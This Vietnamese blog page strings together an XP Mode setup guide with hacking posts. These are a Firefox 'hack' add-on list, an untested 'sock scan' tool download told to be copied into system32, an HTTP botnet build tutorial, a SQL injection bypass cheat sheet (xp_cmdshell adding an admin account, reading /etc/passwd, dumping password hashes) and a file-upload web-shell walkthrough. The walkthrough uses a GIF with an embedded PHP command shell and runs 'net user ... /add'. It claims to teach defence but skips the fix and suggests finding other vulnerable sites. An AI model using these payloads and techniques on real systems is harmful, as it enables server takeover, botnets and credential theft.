Thứ Hai, 28 tháng 2, 2011

Hướng dẫn cài đặt và sử dụng XP Mode trên Windows 7

Đầu tiên, các bạn download XP Mode và Vitual PC tại đây: Download XP Mode và Windows Virtual PC for Windows 7 từ Microsoft

1. Cài bản cập nhật XP Mode:
Bạn chạy file Windows6.1-KB958559-x86.msu (nếu bạn đang sử dụng Windows 7 x86) hoặc Windows6.1-KB958559-x64.msu(nếu bạn đang sử dụng Windows 7 x64) để bắt đầu cập nhật XP Mode cho Windows 7.





Click Yes để bắt đầu cài đặt


Click Accept để đồng ý cài đặt


Quá trình cài đặt XP Mode


Quá trình cài đặt hoàn tất, bạn hãy khởi động lại máy


Một nhóm mới xuất hiện trên Start Menu

2. Cài đặt Virtual Windows XP:

Để cài đặt Virtual Windows XP, bạn chạy file VirtualWindowsXP.msi


Click Next để bắt đầu cài đặt


Chọn vị trí để cài đặt Virtual Windows XP


Quá trình cài đặt 
Virtual Windows XP


Click Finish để hoàn thành quá trình cài đặt Virtual Windows XP


Tick vào ô I accept the license terms để đồng ý các điều khoản sử dụng


Điền vào password dùng để đăng nhập máy ảo


Chọn chế độ cập nhật cho máy ảo


Cấu hình Virtual Windows XP cho lần chạy đầu tiên


Điền mật khẩu để đăng nhập 
Virtual Windows XP
3. Một số hình ảnh về Virtual Windows XP:

Desktop của Virtual Windows XP


Đây là bản XP Sp3


Virtual Windows XP sử dụng IE 6.0

Windows Media Player 9


Truy cập mọi dữ liệu trên máy ảo như máy thật



Virtual Windows XP chỉ hiển thị được chế độ 16 bit màu
-----------------------------------------------------------------------------------------------------------


nếu muốn chuyển sang chế độ màu 32bit thì các bạn làm như sau .

Tools -> Settings -> Integration -> bỏ chọn Enable at startup. khởi động lại windows xp

hoặc trươc khi vào xp Mode thì bạn vào All programs -> Winodws virtual Pc -> virtual machines -> kích chuột phải vào virrtual Windows Xp -> chọn settings -> Integration -> bỏ chọn Enable at startup mở xp Mode lên và chỉnh về chế độ màu 32bit và độ phân giải của màn hình




Tăng RAM bạn làm như sau:

Vào Virtual Machines, chuột phải vào Virtual Windows XP > Setting > Close (cái dòng dưới cùng có dấu X ấy) > Automatically close with following action, chọn shutdown. Rùi. Mở Virtual windows XP ra, sau đó đóng lại, XP Mode sẽ shutdown (cHihứ không ở chế độ Hibernate nữa). Sau đó mở Virtual Machines, chỉnh lại RAM bình thuờng "Chỗ set của em sẽ không bị mờ mất tiu òi nữa).

Của mình đây:

Tổng hợp các công cụ hack cần cho Firefox

Full hack the addon in Firefox


HackBar 1.5.5


Mã:
https://addons.mozilla.org/en-US/firefox/addon/966
Cho phép bạn chỉnh sửa tiêu đề cũng như POST dữ liệu trong một cách dễ dàng để quản lý

Hackbar
Mã:
https://addons.mozilla.org/en-US/firefox/addon/3899
Cho phép bạn thay đổi URL trong một hộp lớn lớn, làm cho SQL tiêm dễ dàng hơn nhiều để xem và quản lý. Cập nhật cho đến FF3 ra vào tuần tới.

Poster
Tương tự như làm xáo trộn dữ liệu nhưng có một phương pháp tiên tiến hơn.

Cookie Watcher
Đồng hồ cookie từ thanh trạng thái

FireCookie
Các .. ở trên, nhưng như là một plugin firebug

Con đom đóm
Bạn phải có điều này nếu bạn đã bao giờ rối tung với các trang web. Dễ dàng cho phép bạn xem / chỉnh sửa mã nguồn HTML cũng như CSS và JS debuggin

ASNumber
Hiển thị IP informatoin và nhiều hơn nữa về trang web của bạn ghé thăm

Mẫu miễn phí
Trong trang soạn thảo hộp nhập liệu. Cho phép bạn chỉnh sửa ẩn đầu vào cũng như vô hiệu hóa.

HTTPFox
Indepth HTTP Analyzer

Tool scan sock free ( 7 tool)

Như đã hứa tớ share anh em tool scan sock. mấy cái này được bạn nó share.
anh em nào dùng thì thanks nhé.
tạm thời 1 post thanks nhiều pub lun

http://www.mediafire.com/?6g8obc73wv26eqx

Hướng dẫn sử dụng:


Trích:
Bước 1: down về và scan virus. Tớ được cho nên ko rõ nó thế nào đâu nhé. ANh em đừng trách tớ.
Bước 2: chạy phần mềm nào mà bạn thích. Hình như có 7 tool. mà dùng hết cũng được.
Nếu chạy được thì OK.
Bước 3: nếu không chạy được anh em thì file pack trong đó coppy vào ổ C://window/system32.
Do tớ chưa kiếm đủ file chạy nên ko chắc chạy đủ 7 tool. Tùy máy thôi.
Sẽ share thêm nhiều tool nữa. Có khoảng 20 tool cơ.
Chúc anh em vui vẻ
lưu ý: tớ chưa test hết anh em dùng rồi cho ý kiến nha

Botnet v3.0 (HTTP Botnet) Source Code



Panel Tutorial:
1). Create a new sql database using the name of your choice and import "botpanel.sql"
2). Modify the files: "includes\config.php" and "\sc_prefs.php"
Compile Builder Tutorial:
1). Compile "Socks5" and "Persistant" and place those files in "Original Stub\Stub\Stub\Resources"
2). Rename "Socks5" to "winsocks" and "Persistant" to "csrse"
3). Compile "Stub" and place it in "Builder\Builder\Resources"
4). Compile the Builder (To Build your bot go to Fertigstellung)
Source
Code:

Thứ Bảy, 26 tháng 2, 2011

Các kỹ thuật bypass SQL Injection Nâng Cao

Bypass PHP Magic Quotes

Ví dụ :

Code:
"SELECT name, surname FROM users WHERE
name='" . $_GET['name'] . "'"
Ta có thể by pass bằng back-end DBMS
Code:
SELECT name, surname FROM users WHERE
name='foobar\' OR 10>4--'
Exploit với câu lệnh Union
Code:
SELECT name, surname FROM users WHERE
name='foobar\' UNION ALL SELECT NAME,
PASSWORD FROM SYS.USER$--'
Boolean-based blind SQL injection exploit
Code:
SELECT name, surname FROM users WHERE
name='foobar\' OR ASCII(SUBSTR((SQL
query), Nth SQL query output char, 1))
> Bisection algorithm number--'
By pass qua lênh load_file
Code:
LOAD_FILE('/etc/passwd')
biến đổi như sau
Code:
LOAD_FILE(CHAR(47,101,116,99,47,112,97,
115,115,119,100))
hoặc
Code:
LOAD_FILE(0x2f6574632f706173737764)
Trong các web asp ta có thể dùng phương pháp back-end DBMS
vd:
Code:
SELECT pg_sleep(3)
thành 
Code:
S%ELEC%T %p%g_sle%ep(%3)
Bypass bằng phương pháp hex đối với MSSQL
vd:
Code:
exec master..xp_cmdshell 'NET USER myuser
mypass /ADD & NET LOCALGROUP
Administrators myuser /ADD'
thành
Code:
DECLARE @rand varchar(8000) SET @rand =
0x65786563206d61737465722e2e78705f636d6473
68656c6c20274e45542055534552206d7975736572
206d7970617373202f4144442026204e4554204c4f
43414c47524f55502041646d696e6973747261746f
7273206d7975736572202f41444427; EXEC
(@rand)
ByPass bằng các dấu comment trong mysql
vd :
Code:
SELECT user, password FROM mysql.user
thành
Code:
SELECT/*R_aNd*/user/*rA.Nd*/,/*Ran|D
*/password/*r+anD*/FROM/*rAn,D*/mysq
l.user
Bypass by random URI encoded payload 
vd:đối với hệ quản trị PostgreSQL
Code:
SELECT schemaname FROM pg_tables
thành
Code:
%53E%4c%45%43T%20%73%63h%65%6d%61%6e
a%6de%20%46%52O%4d%20%70g%5f%74a%62%
6ce%73
Bypass với các câu select đơn
vd:
Code:
SELECT user, password FROM mysql.user
thành
Code:
SELECT GROUP_CONCAT(CONCAT(user, 'RaND',
password)) FROM mysql.user
hoặc sử dụng unhex(hex(trường cần lấy))
Code:
unhex(hex(username))

Bypass với các trường hợp column bị giới hạn


vd:đối với 
Code:
SELECT usename, passwd FROM pg_shadow
thành
Code:
UNION ALL SELECT,
CHR(109)||CHR(107)||CHR(100)||CHR(83)||CHR
(68)||CHR(111)||COALESCE(CAST(usename AS
CHARACTER(10000)),
CHR(32))||CHR(80)||CHR(121)||CHR(80)||CHR(
121)||CHR(66)||CHR(109)||COALESCE(CAST(pas
swd AS CHARACTER(10000)),
CHR(32))||CHR(104)||CHR(108)||CHR(74)||CHR
(103)||CHR(107)||CHR(90), FROM pg_shadow--
Chúc các bạn thành công.

Kỹ thuật hack web qua upload file PHP

Bài viết do anh tocbatdat, giảng viên bộ môn CEH học viện mạng iPMAC biên soạn



Website thương mại hay các forum đượt phát triển từ PHP cho phép upload hình ảnh … rất dễ bị hacker tấn công qua cách upload những Shell lên và chiếm quyền điều khiển. Trong bài viết này tôi sẽ hướng dẫn các bạn kỹ thuật upload một file PHP chiếm quyền điều khiển máy chủ và cách phòng chống lỗi này đối với các quản trị website.
Lỗ hổng này khi kiểm tra với các Tools scan uy tín như: Acunetix, IBM App Scan.. chỉ ở mức Low có nghĩa là mức độ nguy hiểm thấp nhưng lại có thể chiếm quyền điều khiển web server. Với mục đích quan trọng nhất của bài viết là cho người quản trị web hiểu được các nguy cơ tiềm ẩn, các cách khai thác và phòng vệ ra sao. Bài viết được chia ra các mục
1. Tools cần thiết
2. Kỹ thuật upload file PHP và chiếm quyền điều khiển máy chủ web
3. Kỹ thuật bảo mật cho máy chủ web fix lỗ hổng bảo mật này



I. Các tools cần thiết
- Burpsuite_v1.3
- Java framework
- firefox
- website bị lỗi
- r57vn.php

1. Burpsuite_v1.3
Đây là một Tool viết trên nền Java nên muốn chạy được tools này phải cài Java trước. Tools này làm việc như một web proxy nhưng nó là một intercepting proxy.
Intercepting proxy: là một proxy cho phép điều chỉnh nội dung của gói tin người dùng truyền nên web server. Do đó khi ta sử dụng tools này cho phép thay đổi nội dung yêu cầu từ trình duyệt web gửi lên web server.
Link download: http://www.portswigger.net/suite/burpsuite_v1.3.zip

2. Java
Đây là bộ cài Java cho phép các chương trình java chạy trên máy tính
Link download: http://sun.com

3. firefox
Sử dụng firefox bởi một số kỹ thuật không sử dụng IE được

4. Website bị lỗi
Không khuyến cáo mọi người đi hack các trang web khác. Hacker mũ trắng chỉ hack các trang web được sự cho phép của người chủ quản website. Bài viết này tôi sẽ hack trực tiếp vào trang web của tôi là trang http://tocbatdat.com Trang web phát triển trên nền php và dính lỗ hổng.

5. r57vn.php
Là một Shell cho phép làm nhiều tác vụ trên webserver một cách đơn giản


II. Kỹ thuật upload file PHP và chiếm quyền điều khiển máy chủ web

1. Chuẩn bị
Bước 1: cài đặt Java
Bước 2: Download burpsuite_v1.3 về giải nén ra sẽ thấy file .jar thì dừng lại
Bước 3: Cài đặt firefox
Bước 4: Chuẩn bị trình duyệt IE (sử dụng IE để upload file) bởi cấu hình proxy trên IE đơn giản hơn
Bước 5: Kết nối Internet và truy cập trang web http://tocbatdat.com (trong trường hợp website này tôi đã fix lỗ hổng các bạn có thể kiếm web khác dính lỗ hổng này để demo).

2. Thực hiện Upload file php lên website
a. Kiến thức chung
Hầu hết các trang web hiện nay đều chỉ cho upload một số dạng file nhất định như: jpg, gif, … và không cho phép upload các định dạng file khác vậy chúng ta làm thế nào để upload một file PHP lên website này.
Trước hết chúng ta phải hiểu được website làm thế nào để phát hiện ra file này không phải là các định dạng cho phép có hai cách để website kiểm tra:
+ Kiểm tra định dạng file (dạng này rất thông dụng)
+ Kiểm tra đuôi file (dạng này thì không nhiều)
Ví dụ một đoạn code php để upload và check file:
Code:


Code:
<?php
if($_FILES['userfile']['type'] != "image/gif") {
echo "Sorry, we only allow uploading GIF images";
exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?>
- Đoạn code này cho phép kiểm tra chỉ cho phép upload file định dạng image/gif (content type)  Để vượt qua chúng ta chỉ cần chỉnh sửa content type là có thể upload được
- Có đoạn code cho phép kiểm tra nội dung file để phát hiện file đó có phải là file  Để vượt qua chúng ta tạo ra một file ảnh dạng .gif hay jpg rồi dùng notepad để chỉnh sửa, thêm đoạn code php vào cuối file .gif đó rồi đổi đuôi thành .php. Khi upload file này hệ thống sẽ kiểm tra nội dung và phát hiện đây là file gif là cho upload
b. Thực hiện Phương án 1 – Upload shell
- Cài java
- Chạy chương trình Burpsuite_v1.3 để làm Intercepting Proxy. Nhấn đúp vào file .jar giải nén từ bộ download được



Chạy chương trình Burpsuite



Mặc định chương trình này chỉ làm proxy cho chính máy chạy chương trình, để các máy khác có thể sử dụng chương trình này làm proxy phải  Vào tab proxy  chọn Options rồi có thể Edit tùy biến port sử dụng (mặc định là 8080) bỏ dấu check box “loopback ony”





Vào IE chỉnh proxy vào địa chỉ 127.0.0.1 port 8080. IE  IE options  tab connection nhấn vào nút LAN Settings



Thử vào Internet sau khi đặt proxy (vào trang tocbatdat.com). Đã vào được:



Đăng ký một Account để có thể đăng một bài viết và có hình ảnh. Đối với các forum hay website khác cũng cần đăng ký một acc để có thể đăng bài viết.
Login vào bằng một account rồi đăng một bài lên website
- Phần hình ảnh tôi upload Shell r57vn.php
- Chú ý là chưa nhấn nút hoàn thành để Upload bài mà tôi sẽ chỉnh sửa trong Proxy bật tính năng Intercept On lên để toàn bộ nội dung từ trình duyệt sẽ chuyển vào proxy
- Sau đó tôi sẽ vào proxy chỉnh sửa và forward đi



- Bật Intercept On



- Chuyển sang IE nhấn nút “đăng bán hay đăng bài…) để upload thông tin lên websever. Do đặt proxy nên toàn bộ thông tin sẽ chuyển vào proxy



Vào Proxy kiểm tra chúng ta sẽ thấy thông tin:
- Accept (chỉ cho phép các định dạng – tại dòng thứ 2)
- Content-Type của chúng ta lại là: “text/plain” không lằm trong danh mục được upload nên nếu chúng ta cứ forward đi luôn thì file r57vn.php chắc chắn không upload được.
- Tôi chỉnh lại Content-Type là “image/jpeg” là ok và upload lên thành công



Chỉnh sửa content type thành image/jpeg  Nhấn forward để upload file này lên website



- OK tôi đã upload được file r57vn.php lên web server nhưng bây giờ tôi sẽ vào đâu để chạy file này và chính xác ra là đường dẫn file này là thế nào
- Sử dụng Burpsuite với tính năng “Expand Branch” cho phép bạn MAP toàn bộ website sau đó tôi tìm vào mục Upload sẽ thấy file 



- Tôi tìm kiếm trong mục upload có file php nào hay không
- File r57vn.php đã được đổi thành file dvt_126888126926.php (mặc định hầu hết các website sẽ đổi tên file upload)
- Để tìm file vừa upload lên tôi có thể sử dụng tools này hoặc có thể sử dụng các tools scan web khác như Acunetix hoặc IBM App Scan



Giờ tôi chạy file này: đây chính là con Shell r57vn.php tôi đã upload thành công lên máy chủ web. Với shell này tôi có thể làm được khá nhiều tính năng



c. Thực hiện Phương án 2 – Chạy command line trên server
Đối với một số website kiểm tra nội dung của file upload để xem file đó có phải là định dạng được cho phép hay không thì chúng ta có thể lách qua bằng cách.
Bước 1: Dùng Paint tạo ra một file .gif
Bước 2: Dùng notepad mở file .gif này
Bước 3: thêm vào cuối nội dung file câu lệnh: <?system($_GET["cmd"]);?>
Bước 4: Đổi file này thành file .php (sẽ vượt qua được các website check nội dung file)
Bước 5: Dùng kỹ thuật trên Upload file này lên website
Bước 6: Tìm vị trí file (URL của file)
Bước 7: chạy file này bằng cách: http://..../...php?cmd=”câu lệnh trong windows hoặc linux”
Bước 1: Dùng Paint tạo file .gif. Vào paint viết chữ gì cũng dc save as ra dạng file .gif. Tôi Save ra file tobatdat.gif



Bước 2 & 3: Dùng notepad mở file này sau đó thêm vào cuối đoạn mã: <?system($_GET["cmd"]);?> rồi save lại



Bước 4: Đổi file này sang file .php
Bước 5: Sử dụng Intercepting Proxy để upload file này lên webserver



Chúng ta sẽ thấy dữ liệu khi Brower Upload lên server với Content-Type đã trở thành: image/gif bởi đoạn mã kiểm tra nội dung file sẽ phát hiện ra đây là file ảnh. Giờ chúng ta chỉ cần forward đi là OK



Bước 6: Kiểm tra URL. Sau khi Upload file này lên webserver tôi dùng tools Burpsuite để expand branch sẽ phát hiện file mới upload lên



Phát hiện file:



Bước 7: Chạy command line trên máy chủ web
Dùng firefox vào Url này



Chúng ta thử gõ thêm
http://tocbatdat.com/vnss_raovat/upl...10.php?cmd=net user tocbatdat100 yeuemnhieu /add
Và kết quả

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by mkha.hero